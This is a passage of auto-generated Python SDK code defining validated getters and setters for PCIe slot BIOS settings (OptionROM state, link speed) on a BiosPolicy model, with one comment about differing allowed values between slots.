if slot_hba_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_hba_state` ({0}), must be one of {1}"
.format(slot_hba_state, allowed_values)
)
self._slot_hba_state = slot_hba_state
@property
def slot_lom1link(self):
"""
Gets the slot_lom1link of this BiosPolicy.
BIOS Token for setting PCIe LOM:1 Link configuration
:return: The slot_lom1link of this BiosPolicy.
:rtype: str
"""
return self._slot_lom1link
@slot_lom1link.setter
def slot_lom1link(self, slot_lom1link):
"""
Sets the slot_lom1link of this BiosPolicy.
BIOS Token for setting PCIe LOM:1 Link configuration
:param slot_lom1link: The slot_lom1link of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_lom1link not in allowed_values:
raise ValueError(
"Invalid value for `slot_lom1link` ({0}), must be one of {1}"
.format(slot_lom1link, allowed_values)
)
self._slot_lom1link = slot_lom1link
@property
def slot_lom2link(self):
"""
Gets the slot_lom2link of this BiosPolicy.
BIOS Token for setting PCIe LOM:2 Link configuration
:return: The slot_lom2link of this BiosPolicy.
:rtype: str
"""
return self._slot_lom2link
@slot_lom2link.setter
def slot_lom2link(self, slot_lom2link):
"""
Sets the slot_lom2link of this BiosPolicy.
BIOS Token for setting PCIe LOM:2 Link configuration
:param slot_lom2link: The slot_lom2link of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_lom2link not in allowed_values:
raise ValueError(
"Invalid value for `slot_lom2link` ({0}), must be one of {1}"
.format(slot_lom2link, allowed_values)
)
self._slot_lom2link = slot_lom2link
@property
def slot_mezz_state(self):
"""
Gets the slot_mezz_state of this BiosPolicy.
BIOS Token for setting Slot Mezz state configuration
:return: The slot_mezz_state of this BiosPolicy.
:rtype: str
"""
return self._slot_mezz_state
@slot_mezz_state.setter
def slot_mezz_state(self, slot_mezz_state):
"""
Sets the slot_mezz_state of this BiosPolicy.
BIOS Token for setting Slot Mezz state configuration
:param slot_mezz_state: The slot_mezz_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_mezz_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_mezz_state` ({0}), must be one of {1}"
.format(slot_mezz_state, allowed_values)
)
self._slot_mezz_state = slot_mezz_state
@property
def slot_mlom_link_speed(self):
"""
Gets the slot_mlom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:MLOM Link Speed configuration
:return: The slot_mlom_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_mlom_link_speed
@slot_mlom_link_speed.setter
def slot_mlom_link_speed(self, slot_mlom_link_speed):
"""
Sets the slot_mlom_link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:MLOM Link Speed configuration
:param slot_mlom_link_speed: The slot_mlom_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_mlom_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_mlom_link_speed` ({0}), must be one of {1}"
.format(slot_mlom_link_speed, allowed_values)
)
self._slot_mlom_link_speed = slot_mlom_link_speed
@property
def slot_mlom_state(self):
"""
Gets the slot_mlom_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MLOM OptionROM configuration
:return: The slot_mlom_state of this BiosPolicy.
:rtype: str
"""
return self._slot_mlom_state
@slot_mlom_state.setter
def slot_mlom_state(self, slot_mlom_state):
"""
Sets the slot_mlom_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MLOM OptionROM configuration
:param slot_mlom_state: The slot_mlom_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_mlom_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_mlom_state` ({0}), must be one of {1}"
.format(slot_mlom_state, allowed_values)
)
self._slot_mlom_state = slot_mlom_state
@property
def slot_mraid_link_speed(self):
"""
Gets the slot_mraid_link_speed of this BiosPolicy.
BIOS Token for setting MRAID Link Speed configuration
:return: The slot_mraid_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_mraid_link_speed
@slot_mraid_link_speed.setter
def slot_mraid_link_speed(self, slot_mraid_link_speed):
"""
Sets the slot_mraid_link_speed of this BiosPolicy.
BIOS Token for setting MRAID Link Speed configuration
:param slot_mraid_link_speed: The slot_mraid_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_mraid_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_mraid_link_speed` ({0}), must be one of {1}"
.format(slot_mraid_link_speed, allowed_values)
)
self._slot_mraid_link_speed = slot_mraid_link_speed
@property
def slot_mraid_state(self):
"""
Gets the slot_mraid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MRAID OptionROM configuration
:return: The slot_mraid_state of this BiosPolicy.
:rtype: str
"""
return self._slot_mraid_state
@slot_mraid_state.setter
def slot_mraid_state(self, slot_mraid_state):
"""
Sets the slot_mraid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot MRAID OptionROM configuration
:param slot_mraid_state: The slot_mraid_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_mraid_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_mraid_state` ({0}), must be one of {1}"
.format(slot_mraid_state, allowed_values)
)
self._slot_mraid_state = slot_mraid_state
@property
def slot_n10state(self):
"""
Gets the slot_n10state of this BiosPolicy.
BIOS Token for setting PCIe Slot N10 OptionROM configuration
:return: The slot_n10state of this BiosPolicy.
:rtype: str
"""
return self._slot_n10state
@slot_n10state.setter
def slot_n10state(self, slot_n10state):
"""
Sets the slot_n10state of this BiosPolicy.
BIOS Token for setting PCIe Slot N10 OptionROM configuration
:param slot_n10state: The slot_n10state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n10state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n10state` ({0}), must be one of {1}"
.format(slot_n10state, allowed_values)
)
self._slot_n10state = slot_n10state
@property
def slot_n11state(self):
"""
Gets the slot_n11state of this BiosPolicy.
BIOS Token for setting PCIe Slot N11 OptionROM configuration
:return: The slot_n11state of this BiosPolicy.
:rtype: str
"""
return self._slot_n11state
@slot_n11state.setter
def slot_n11state(self, slot_n11state):
"""
Sets the slot_n11state of this BiosPolicy.
BIOS Token for setting PCIe Slot N11 OptionROM configuration
:param slot_n11state: The slot_n11state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n11state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n11state` ({0}), must be one of {1}"
.format(slot_n11state, allowed_values)
)
self._slot_n11state = slot_n11state
@property
def slot_n12state(self):
"""
Gets the slot_n12state of this BiosPolicy.
BIOS Token for setting PCIe Slot N12 OptionROM configuration
:return: The slot_n12state of this BiosPolicy.
:rtype: str
"""
return self._slot_n12state
@slot_n12state.setter
def slot_n12state(self, slot_n12state):
"""
Sets the slot_n12state of this BiosPolicy.
BIOS Token for setting PCIe Slot N12 OptionROM configuration
:param slot_n12state: The slot_n12state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n12state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n12state` ({0}), must be one of {1}"
.format(slot_n12state, allowed_values)
)
self._slot_n12state = slot_n12state
@property
def slot_n13state(self):
"""
Gets the slot_n13state of this BiosPolicy.
BIOS Token for setting PCIe Slot N13 OptionROM configuration
:return: The slot_n13state of this BiosPolicy.
:rtype: str
"""
return self._slot_n13state
@slot_n13state.setter
def slot_n13state(self, slot_n13state):
"""
Sets the slot_n13state of this BiosPolicy.
BIOS Token for setting PCIe Slot N13 OptionROM configuration
:param slot_n13state: The slot_n13state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n13state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n13state` ({0}), must be one of {1}"
.format(slot_n13state, allowed_values)
)
self._slot_n13state = slot_n13state
@property
def slot_n14state(self):
"""
Gets the slot_n14state of this BiosPolicy.
BIOS Token for setting PCIe Slot N14 OptionROM configuration
:return: The slot_n14state of this BiosPolicy.
:rtype: str
"""
return self._slot_n14state
@slot_n14state.setter
def slot_n14state(self, slot_n14state):
"""
Sets the slot_n14state of this BiosPolicy.
BIOS Token for setting PCIe Slot N14 OptionROM configuration
:param slot_n14state: The slot_n14state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n14state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n14state` ({0}), must be one of {1}"
.format(slot_n14state, allowed_values)
)
self._slot_n14state = slot_n14state
@property
def slot_n15state(self):
"""
Gets the slot_n15state of this BiosPolicy.
BIOS Token for setting PCIe Slot N15 OptionROM configuration
:return: The slot_n15state of this BiosPolicy.
:rtype: str
"""
return self._slot_n15state
@slot_n15state.setter
def slot_n15state(self, slot_n15state):
"""
Sets the slot_n15state of this BiosPolicy.
BIOS Token for setting PCIe Slot N15 OptionROM configuration
:param slot_n15state: The slot_n15state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n15state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n15state` ({0}), must be one of {1}"
.format(slot_n15state, allowed_values)
)
self._slot_n15state = slot_n15state
@property
def slot_n16state(self):
"""
Gets the slot_n16state of this BiosPolicy.
BIOS Token for setting PCIe Slot N16 OptionROM configuration
:return: The slot_n16state of this BiosPolicy.
:rtype: str
"""
return self._slot_n16state
@slot_n16state.setter
def slot_n16state(self, slot_n16state):
"""
Sets the slot_n16state of this BiosPolicy.
BIOS Token for setting PCIe Slot N16 OptionROM configuration
:param slot_n16state: The slot_n16state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n16state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n16state` ({0}), must be one of {1}"
.format(slot_n16state, allowed_values)
)
self._slot_n16state = slot_n16state
@property
def slot_n17state(self):
"""
Gets the slot_n17state of this BiosPolicy.
BIOS Token for setting PCIe Slot N17 OptionROM configuration
:return: The slot_n17state of this BiosPolicy.
:rtype: str
"""
return self._slot_n17state
@slot_n17state.setter
def slot_n17state(self, slot_n17state):
"""
Sets the slot_n17state of this BiosPolicy.
BIOS Token for setting PCIe Slot N17 OptionROM configuration
:param slot_n17state: The slot_n17state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n17state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n17state` ({0}), must be one of {1}"
.format(slot_n17state, allowed_values)
)
self._slot_n17state = slot_n17state
@property
def slot_n18state(self):
"""
Gets the slot_n18state of this BiosPolicy.
BIOS Token for setting PCIe Slot N18 OptionROM configuration
:return: The slot_n18state of this BiosPolicy.
:rtype: str
"""
return self._slot_n18state
@slot_n18state.setter
def slot_n18state(self, slot_n18state):
"""
Sets the slot_n18state of this BiosPolicy.
BIOS Token for setting PCIe Slot N18 OptionROM configuration
:param slot_n18state: The slot_n18state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n18state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n18state` ({0}), must be one of {1}"
.format(slot_n18state, allowed_values)
)
self._slot_n18state = slot_n18state
@property
def slot_n19state(self):
"""
Gets the slot_n19state of this BiosPolicy.
BIOS Token for setting PCIe Slot N19 OptionROM configuration
:return: The slot_n19state of this BiosPolicy.
:rtype: str
"""
return self._slot_n19state
@slot_n19state.setter
def slot_n19state(self, slot_n19state):
"""
Sets the slot_n19state of this BiosPolicy.
BIOS Token for setting PCIe Slot N19 OptionROM configuration
:param slot_n19state: The slot_n19state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n19state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n19state` ({0}), must be one of {1}"
.format(slot_n19state, allowed_values)
)
self._slot_n19state = slot_n19state
@property
def slot_n1state(self):
"""
Gets the slot_n1state of this BiosPolicy.
BIOS Token for setting PCIe Slot N1 OptionROM configuration
:return: The slot_n1state of this BiosPolicy.
:rtype: str
"""
return self._slot_n1state
@slot_n1state.setter
def slot_n1state(self, slot_n1state):
"""
Sets the slot_n1state of this BiosPolicy.
BIOS Token for setting PCIe Slot N1 OptionROM configuration
:param slot_n1state: The slot_n1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_n1state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n1state` ({0}), must be one of {1}"
.format(slot_n1state, allowed_values)
)
self._slot_n1state = slot_n1state
@property
def slot_n20state(self):
"""
Gets the slot_n20state of this BiosPolicy.
BIOS Token for setting PCIe Slot N20 OptionROM configuration
:return: The slot_n20state of this BiosPolicy.
:rtype: str
"""
return self._slot_n20state
@slot_n20state.setter
def slot_n20state(self, slot_n20state):
"""
Sets the slot_n20state of this BiosPolicy.
BIOS Token for setting PCIe Slot N20 OptionROM configuration
:param slot_n20state: The slot_n20state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n20state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n20state` ({0}), must be one of {1}"
.format(slot_n20state, allowed_values)
)
self._slot_n20state = slot_n20state
@property
def slot_n21state(self):
"""
Gets the slot_n21state of this BiosPolicy.
BIOS Token for setting PCIe Slot N21 OptionROM configuration
:return: The slot_n21state of this BiosPolicy.
:rtype: str
"""
return self._slot_n21state
@slot_n21state.setter
def slot_n21state(self, slot_n21state):
"""
Sets the slot_n21state of this BiosPolicy.
BIOS Token for setting PCIe Slot N21 OptionROM configuration
:param slot_n21state: The slot_n21state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n21state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n21state` ({0}), must be one of {1}"
.format(slot_n21state, allowed_values)
)
self._slot_n21state = slot_n21state
@property
def slot_n22state(self):
"""
Gets the slot_n22state of this BiosPolicy.
BIOS Token for setting PCIe Slot N22 OptionROM configuration
:return: The slot_n22state of this BiosPolicy.
:rtype: str
"""
return self._slot_n22state
@slot_n22state.setter
def slot_n22state(self, slot_n22state):
"""
Sets the slot_n22state of this BiosPolicy.
BIOS Token for setting PCIe Slot N22 OptionROM configuration
:param slot_n22state: The slot_n22state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n22state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n22state` ({0}), must be one of {1}"
.format(slot_n22state, allowed_values)
)
self._slot_n22state = slot_n22state
@property
def slot_n23state(self):
"""
Gets the slot_n23state of this BiosPolicy.
BIOS Token for setting PCIe Slot N23 OptionROM configuration
:return: The slot_n23state of this BiosPolicy.
:rtype: str
"""
return self._slot_n23state
@slot_n23state.setter
def slot_n23state(self, slot_n23state):
"""
Sets the slot_n23state of this BiosPolicy.
BIOS Token for setting PCIe Slot N23 OptionROM configuration
:param slot_n23state: The slot_n23state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n23state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n23state` ({0}), must be one of {1}"
.format(slot_n23state, allowed_values)
)
self._slot_n23state = slot_n23state
@property
def slot_n24state(self):
"""
Gets the slot_n24state of this BiosPolicy.
BIOS Token for setting PCIe Slot N24 OptionROM configuration
:return: The slot_n24state of this BiosPolicy.
:rtype: str
"""
return self._slot_n24state
@slot_n24state.setter
def slot_n24state(self, slot_n24state):
"""
Sets the slot_n24state of this BiosPolicy.
BIOS Token for setting PCIe Slot N24 OptionROM configuration
:param slot_n24state: The slot_n24state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n24state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n24state` ({0}), must be one of {1}"
.format(slot_n24state, allowed_values)
)
self._slot_n24state = slot_n24state
@property
def slot_n2state(self):
"""
Gets the slot_n2state of this BiosPolicy.
BIOS Token for setting PCIe Slot N2 OptionROM configuration
:return: The slot_n2state of this BiosPolicy.
:rtype: str
"""
return self._slot_n2state
@slot_n2state.setter
def slot_n2state(self, slot_n2state):
"""
Sets the slot_n2state of this BiosPolicy.
BIOS Token for setting PCIe Slot N2 OptionROM configuration
:param slot_n2state: The slot_n2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if slot_n2state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n2state` ({0}), must be one of {1}"
.format(slot_n2state, allowed_values)
)
self._slot_n2state = slot_n2state
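# Note the asymmetry in the generated slot_n* tokens: slot_n1state and
# slot_n2state accept the extended OptionROM values ("Legacy Only",
# "UEFI Only") alongside enabled/disabled, while slot_n3state through
# slot_n24state accept only "platform-default", "enabled" and "disabled".
# A caller can lean on the setters' ValueError to fall back (sketch only):
#
#     try:
#         policy.slot_n3state = "UEFI Only"
#     except ValueError:
#         policy.slot_n3state = "enabled"   # narrow value set for N3-N24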
@property
def slot_n3state(self):
"""
Gets the slot_n3state of this BiosPolicy.
BIOS Token for setting PCIe Slot N3 OptionROM configuration
:return: The slot_n3state of this BiosPolicy.
:rtype: str
"""
return self._slot_n3state
@slot_n3state.setter
def slot_n3state(self, slot_n3state):
"""
Sets the slot_n3state of this BiosPolicy.
BIOS Token for setting PCIe Slot N3 OptionROM configuration
:param slot_n3state: The slot_n3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n3state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n3state` ({0}), must be one of {1}"
.format(slot_n3state, allowed_values)
)
self._slot_n3state = slot_n3state
@property
def slot_n4state(self):
"""
Gets the slot_n4state of this BiosPolicy.
BIOS Token for setting PCIe Slot N4 OptionROM configuration
:return: The slot_n4state of this BiosPolicy.
:rtype: str
"""
return self._slot_n4state
@slot_n4state.setter
def slot_n4state(self, slot_n4state):
"""
Sets the slot_n4state of this BiosPolicy.
BIOS Token for setting PCIe Slot N4 OptionROM configuration
:param slot_n4state: The slot_n4state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n4state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n4state` ({0}), must be one of {1}"
.format(slot_n4state, allowed_values)
)
self._slot_n4state = slot_n4state
@property
def slot_n5state(self):
"""
Gets the slot_n5state of this BiosPolicy.
BIOS Token for setting PCIe Slot N5 OptionROM configuration
:return: The slot_n5state of this BiosPolicy.
:rtype: str
"""
return self._slot_n5state
@slot_n5state.setter
def slot_n5state(self, slot_n5state):
"""
Sets the slot_n5state of this BiosPolicy.
BIOS Token for setting PCIe Slot N5 OptionROM configuration
:param slot_n5state: The slot_n5state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n5state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n5state` ({0}), must be one of {1}"
.format(slot_n5state, allowed_values)
)
self._slot_n5state = slot_n5state
@property
def slot_n6state(self):
"""
Gets the slot_n6state of this BiosPolicy.
BIOS Token for setting PCIe Slot N6 OptionROM configuration
:return: The slot_n6state of this BiosPolicy.
:rtype: str
"""
return self._slot_n6state
@slot_n6state.setter
def slot_n6state(self, slot_n6state):
"""
Sets the slot_n6state of this BiosPolicy.
BIOS Token for setting PCIe Slot N6 OptionROM configuration
:param slot_n6state: The slot_n6state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n6state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n6state` ({0}), must be one of {1}"
.format(slot_n6state, allowed_values)
)
self._slot_n6state = slot_n6state
@property
def slot_n7state(self):
"""
Gets the slot_n7state of this BiosPolicy.
BIOS Token for setting PCIe Slot N7 OptionROM configuration
:return: The slot_n7state of this BiosPolicy.
:rtype: str
"""
return self._slot_n7state
@slot_n7state.setter
def slot_n7state(self, slot_n7state):
"""
Sets the slot_n7state of this BiosPolicy.
BIOS Token for setting PCIe Slot N7 OptionROM configuration
:param slot_n7state: The slot_n7state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n7state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n7state` ({0}), must be one of {1}"
.format(slot_n7state, allowed_values)
)
self._slot_n7state = slot_n7state
@property
def slot_n8state(self):
"""
Gets the slot_n8state of this BiosPolicy.
BIOS Token for setting PCIe Slot N8 OptionROM configuration
:return: The slot_n8state of this BiosPolicy.
:rtype: str
"""
return self._slot_n8state
@slot_n8state.setter
def slot_n8state(self, slot_n8state):
"""
Sets the slot_n8state of this BiosPolicy.
BIOS Token for setting PCIe Slot N8 OptionROM configuration
:param slot_n8state: The slot_n8state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n8state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n8state` ({0}), must be one of {1}"
.format(slot_n8state, allowed_values)
)
self._slot_n8state = slot_n8state
@property
def slot_n9state(self):
"""
Gets the slot_n9state of this BiosPolicy.
BIOS Token for setting PCIe Slot N9 OptionROM configuration
:return: The slot_n9state of this BiosPolicy.
:rtype: str
"""
return self._slot_n9state
@slot_n9state.setter
def slot_n9state(self, slot_n9state):
"""
Sets the slot_n9state of this BiosPolicy.
BIOS Token for setting PCIe Slot N9 OptionROM configuration
:param slot_n9state: The slot_n9state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_n9state not in allowed_values:
raise ValueError(
"Invalid value for `slot_n9state` ({0}), must be one of {1}"
.format(slot_n9state, allowed_values)
)
self._slot_n9state = slot_n9state
@property
def slot_raid_link_speed(self):
"""
Gets the slot_raid_link_speed of this BiosPolicy.
BIOS Token for setting RAID Link Speed configuration
:return: The slot_raid_link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_raid_link_speed
@slot_raid_link_speed.setter
def slot_raid_link_speed(self, slot_raid_link_speed):
"""
Sets the slot_raid_link_speed of this BiosPolicy.
BIOS Token for setting RAID Link Speed configuration
:param slot_raid_link_speed: The slot_raid_link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_raid_link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_raid_link_speed` ({0}), must be one of {1}"
.format(slot_raid_link_speed, allowed_values)
)
self._slot_raid_link_speed = slot_raid_link_speed
@property
def slot_raid_state(self):
"""
Gets the slot_raid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot RAID OptionROM configuration
:return: The slot_raid_state of this BiosPolicy.
:rtype: str
"""
return self._slot_raid_state
@slot_raid_state.setter
def slot_raid_state(self, slot_raid_state):
"""
Sets the slot_raid_state of this BiosPolicy.
BIOS Token for setting PCIe Slot RAID OptionROM configuration
:param slot_raid_state: The slot_raid_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_raid_state not in allowed_values:
raise ValueError(
"Invalid value for `slot_raid_state` ({0}), must be one of {1}"
.format(slot_raid_state, allowed_values)
)
self._slot_raid_state = slot_raid_state
@property
def slot_rear_nvme1link_speed(self):
"""
Gets the slot_rear_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme1 Link Speed configuration
:return: The slot_rear_nvme1link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme1link_speed
@slot_rear_nvme1link_speed.setter
def slot_rear_nvme1link_speed(self, slot_rear_nvme1link_speed):
"""
Sets the slot_rear_nvme1link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme1 Link Speed configuration
:param slot_rear_nvme1link_speed: The slot_rear_nvme1link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_rear_nvme1link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme1link_speed` ({0}), must be one of {1}"
.format(slot_rear_nvme1link_speed, allowed_values)
)
self._slot_rear_nvme1link_speed = slot_rear_nvme1link_speed
@property
def slot_rear_nvme1state(self):
"""
Gets the slot_rear_nvme1state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 1 OptionROM configuration
:return: The slot_rear_nvme1state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme1state
@slot_rear_nvme1state.setter
def slot_rear_nvme1state(self, slot_rear_nvme1state):
"""
Sets the slot_rear_nvme1state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 1 OptionROM configuration
:param slot_rear_nvme1state: The slot_rear_nvme1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme1state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme1state` ({0}), must be one of {1}"
.format(slot_rear_nvme1state, allowed_values)
)
self._slot_rear_nvme1state = slot_rear_nvme1state
@property
def slot_rear_nvme2link_speed(self):
"""
Gets the slot_rear_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme2 Link Speed configuration
:return: The slot_rear_nvme2link_speed of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme2link_speed
@slot_rear_nvme2link_speed.setter
def slot_rear_nvme2link_speed(self, slot_rear_nvme2link_speed):
"""
Sets the slot_rear_nvme2link_speed of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear Nvme2 Link Speed configuration
:param slot_rear_nvme2link_speed: The slot_rear_nvme2link_speed of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"]
if slot_rear_nvme2link_speed not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme2link_speed` ({0}), must be one of {1}"
.format(slot_rear_nvme2link_speed, allowed_values)
)
self._slot_rear_nvme2link_speed = slot_rear_nvme2link_speed
@property
def slot_rear_nvme2state(self):
"""
Gets the slot_rear_nvme2state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 2 OptionROM configuration
:return: The slot_rear_nvme2state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme2state
@slot_rear_nvme2state.setter
def slot_rear_nvme2state(self, slot_rear_nvme2state):
"""
Sets the slot_rear_nvme2state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 2 OptionROM configuration
:param slot_rear_nvme2state: The slot_rear_nvme2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme2state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme2state` ({0}), must be one of {1}"
.format(slot_rear_nvme2state, allowed_values)
)
self._slot_rear_nvme2state = slot_rear_nvme2state
@property
def slot_rear_nvme3state(self):
"""
Gets the slot_rear_nvme3state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 3 OptionROM configuration
:return: The slot_rear_nvme3state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme3state
@slot_rear_nvme3state.setter
def slot_rear_nvme3state(self, slot_rear_nvme3state):
"""
Sets the slot_rear_nvme3state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 3 OptionROM configuration
:param slot_rear_nvme3state: The slot_rear_nvme3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme3state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme3state` ({0}), must be one of {1}"
.format(slot_rear_nvme3state, allowed_values)
)
self._slot_rear_nvme3state = slot_rear_nvme3state
@property
def slot_rear_nvme4state(self):
"""
Gets the slot_rear_nvme4state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 4 OptionROM configuration
:return: The slot_rear_nvme4state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme4state
@slot_rear_nvme4state.setter
def slot_rear_nvme4state(self, slot_rear_nvme4state):
"""
Sets the slot_rear_nvme4state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 4 OptionROM configuration
:param slot_rear_nvme4state: The slot_rear_nvme4state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme4state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme4state` ({0}), must be one of {1}"
.format(slot_rear_nvme4state, allowed_values)
)
self._slot_rear_nvme4state = slot_rear_nvme4state
@property
def slot_rear_nvme5state(self):
"""
Gets the slot_rear_nvme5state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 5 OptionROM configuration
:return: The slot_rear_nvme5state of this BiosPolicy.
:rtype: str
"""
return self._slot_rear_nvme5state
@slot_rear_nvme5state.setter
def slot_rear_nvme5state(self, slot_rear_nvme5state):
"""
Sets the slot_rear_nvme5state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 5 OptionROM configuration
:param slot_rear_nvme5state: The slot_rear_nvme5state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if slot_rear_nvme5state not in allowed_values:
raise ValueError(
"Invalid value for `slot_rear_nvme5state` ({0}), must be one of {1}"
.format(slot_rear_nvme5state, allowed_values)
)
self._slot_rear_nvme5state = slot_rear_nvme5state
@property
def slot_rear_nvme6state(self):
"""
Gets the slot_rear_nvme6state of this BiosPolicy.
BIOS Token for setting PCIe Slot:Rear NVME 6 OptionROM configuration
